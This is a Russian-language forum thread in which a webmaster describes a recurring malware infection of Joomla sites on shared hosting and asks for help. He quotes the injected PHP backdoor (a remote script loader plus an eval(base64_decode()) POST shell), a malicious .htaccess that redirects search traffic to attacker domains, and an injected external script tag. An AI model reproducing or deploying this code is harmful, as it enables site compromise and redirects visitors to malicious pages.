Компьютерный форум
Правила
Вернуться   Компьютерный форум > Форум программистов > Веб-программирование > PHP
Перезагрузить страницу Проблема на хостинге. Вирус. Изменяется .htaccess
Ответ
 
Опции темы Опции просмотра
  (#1 (permalink)) Старый
ariy85 ariy85 вне форума
Новичок
 
Сообщений: 1
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Регистрация: 16.11.2011
По умолчанию Проблема на хостинге. Вирус. Изменяется .htaccess - 16.11.2011, 12:04

Доброго времени суток,
Наверно пишу не на тот форум, если так прошу модераторов перенести тему. Проблема заключается в следующем:
Есть хостинг. Bluehost. на хостинге крутится несколько сайтов на базе:
1 шт. Drupal CMS
2 шт. флеш
2 шт. Joomla 1.5.22
3 шт. тупо HTML
и еще 5 штук домены для почты, ftp и vpn(хранят a и mx записи).

Каждый из сайтов находится в своей директории в корне public_html. Рутовая директория пустая(за исключением этих субдиректорий с сайтами) и не для одного сайта не используется в ней как первичного не используется. Все началось 4 дня назад, когда позвонила девочка для которой делал сайт на Joomla. В самом начале index.php после <?php обнаружился следующий код:

##global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_ f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_ f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43), $_POST[$sessdt_p])));exit;} }

Выкачал весь хостинг, немного-немало 900метров, и начал искать данный код Notepad++. Оказалось было заражено около 1600 файлов. Удалил зараженные домены и перезалил чищенные файлы. Первые 5 минут работало все нормально. Потом началась та же история. Каждый линк на сайте вел непонятно куда на страницу вроде этих:
http://tvoya-moya.in/deba/index.php
http://softsaski.in/covka/index.php
и т.д., а потом редиректил на Google. Это был уже второй день мучений. Начал ковырять конфиги самого хостера и нашел такую закономерность, что в каждом каталоге создавался файл .htaccess с такими вот записями:

ErrorDocument 400 http://softsaski.in/covka/index.php
ErrorDocument 401 http://softsaski.in/covka/index.php
ErrorDocument 403 http://softsaski.in/covka/index.php
ErrorDocument 404 http://softsaski.in/covka/index.php
ErrorDocument 500 http://softsaski.in/covka/index.php
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://softsaski.in/covka/index.php [R=301,L]
</IfModule>

И мало того в корне каждого домена, но и в руте хостинга и в директории выше public_html появился файл .htaccess с такими же записями. Решил рискнуть и заблокировать доступ на файл для всех (раньше файл имел разрешение 444). Удалил эти строки и поставил разрешение на .htaccess 000. Соответственно мне доступ на public_html закрылся.
По истечении 10-15 минут, доступ вновь открылся и мне представился файл с этими же левыми записями. Посчитал что настало время обратится к саппорту хостинга. Ребята с большой радостью восприняли известие, что у них на сервере живет вирус и предложили восстановить все с бякапа 2 недельной давности.
Восстановили, та же самая фигня. Далее я попросил их восстановить с бякапа месячной давности, хотя данные много раз были изменены с того времени.
И это не помогло. удаление .htaccess также не приносит плодов, он произвольно появляется и почему то затрагивает сайты на Joomla. Остальные работают нормально, хоть и не здорово(тормозят и виснут). Далее хостер предложил позакрыват открытый доступ на index.php(поставить Under Construction html файл.) на всех доменах, потереть вредоносный код и отследить с какого IP идет атака через CPanel. На свое и их удивление, файлы изменились, но обращения извне не на один домен не было. После этого я в очередной раз обратился к хостеру, с фразой что они дибилы, и не могут элементарно дать мне список зараженных скриптов, на что мне ответили, что заплати 29евро и твой сайт будет проверен антивирусом. Раньше они это предлогали бесплатно.
Платить не хотелось, вернее нет возможности. И я начал искать файлы с подозрительными записями в корне хостинга(в директории выше public_html) и нашел в директории Cache файл index.html со следующей записью:

<html><body bgcolor="#FFFFFF"></body></html>




<script type="text/javascript" src="http://sfofotky.iexam.info:8080/Beta_Software.js"></script>
<!--05fda25504cdd3e22930ccbe28611742-->


Вот мой стандартный .htaccess:

Options +SymLinksIfOwnerMatch
RewriteEngine Off
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php [F,L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_URI} !^/index.php
RewriteCond %{REQUEST_URI} (/|\.php|\.html|\.htm|\.feed|\.pdf|\.raw|/[^.]*)$ [NC]
RewriteRule (.*) index.php
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization},L]

php.ini в прикрепленном файле. Ребят помогите. реально уже замучался с этой проблемой((( Просьба к модераторам, не закрывайте тему, пока не будет полезного решения. Просьба к форумчанам, не имея идей, прошу не набивать пустые посты, типа "Google тебе в помощь" и "спроси у гуру".

Заранее спасибо всем за помощь и ответы.
Вложения
Тип файла: txt php.ini.txt (3.7 Кб, 155 просмотров)
Ответить с цитированием
  (#2 (permalink)) Старый
Виктоория Виктоория вне форума
Новичок
 
Сообщений: 1
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Регистрация: 16.03.2012
По умолчанию 16.03.2012, 15:55

Ваш сайт был заражен методом SQL Injection. mysql инъекции возможны через внедрение через параметры cookie произвольного кода в запросы SQL, отправляемые скриптом базе, нужны знания языков php и sql, нужно проверять весь сайт и базу данных, хостера вины в этом нет, конфигурация по умолчанию модуля mod_security сервера apache не фильтрует значение, переданные как cookie.
Ответить с цитированием
  (#3 (permalink)) Старый
FirstWeb FirstWeb вне форума
Новичок
 
Сообщений: 11
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Регистрация: 08.04.2012
По умолчанию 08.04.2012, 01:03

Могу помочь с этой проблемой. Что за сайт?
Ответить с цитированием
  (#4 (permalink)) Старый
adamme adamme вне форума
Новичок
 
Сообщений: 1
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Регистрация: 29.11.2012
По умолчанию 29.11.2012, 03:05

Как-то решилось? Т.к. у меня те-же проблемы...
Ответить с цитированием
Ads
Ответ

Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Trackbacks are Вкл.
Pingbacks are Вкл.
Refbacks are Выкл.


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
вирус или проблема с железом? torrr Любые вопросы от новичков 12 05.01.2012 00:00
Проблема. Вирус? Kostyan350 Любые вопросы от новичков 11 22.07.2011 21:12
Изменяется размер жесткого диска. это нормальное явление? Руслан46 Любые вопросы от новичков 2 19.12.2008 22:08
Хочу сделать сервер ICQ сообщений на своем хостинге dabogee PHP 4 23.02.2008 14:28
Произвольно изменяется масштаб интернет страниц в браузере. nowhereman19mos Любые вопросы от новичков 3 10.09.2007 12:33
Как сделать ASP на бесплатном хостинге SergeyV ASP 4 12.01.2007 22:06
Регион формы не изменяется!?? Fuud Visual Basic 1 20.06.2005 16:24
Как насторить и запустить CGI скрипт на хостинге ФОНАРЬ C++ Builder 2 02.03.2005 16:24
Проблемы со скриптами на бесплатном хостинге holm.ru dyv Perl 1 12.09.2004 08:39
После удаления в диспетчере количество потоков не изменяется Anry Delphi 14 19.08.2004 14:02
Как защитится от произвола админа на хостинге. -=[-_-]=- PHP 1 25.01.2004 01:29



Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2018, Jelsoft Enterprises Ltd.
Нardforum.ru - компьютерный форум и программирование, форум программистов